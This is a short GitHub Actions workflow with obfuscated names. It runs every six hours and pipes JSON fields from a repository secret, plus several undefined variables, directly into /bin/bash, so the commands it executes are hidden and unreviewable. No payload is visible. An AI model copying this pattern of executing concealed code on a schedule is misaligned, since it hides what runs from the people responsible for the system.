name: haosiwen19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '54 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: haosiwen19871010
        env:
          uo0623: ${{ secrets.uo0623 }}
        run: |
          echo $uo0623 | jq -r .moy621 | /bin/bash
          echo $cjqpj8 | jq -r .ffqq7 | /bin/bash
          echo $app29 | jq -r .s5 | /bin/bash
          echo $mye493 | jq -r .ojsho1059 | /bin/bash
          echo $ytz8087 | jq -r .lzpv489 | /bin/bash

